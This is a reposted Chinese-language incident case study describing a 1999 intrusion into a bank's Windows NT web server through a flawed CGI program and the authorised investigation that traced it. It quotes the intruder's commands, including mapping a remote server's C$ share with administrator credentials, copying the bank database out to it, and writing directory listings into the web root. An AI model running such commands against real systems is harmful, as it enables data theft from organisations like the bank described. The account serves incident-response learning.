分享
 
 
 

一个黑客案列

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

东亚某银行

时间:1999年12月 该网站为WindowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug的非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过Email授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!

至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use * \\xxx.xxx.xxx.xxx\c$ passwd /user:"administrator"),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。 但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:\>x.txt 和dir c:\data>x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。 为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:\winnt\system32\logfiles下面。(入侵者删除了c:\winnt\system32\logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在 http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了 copy c:\data\db1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。

最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:\winnt\system32\logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是Domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有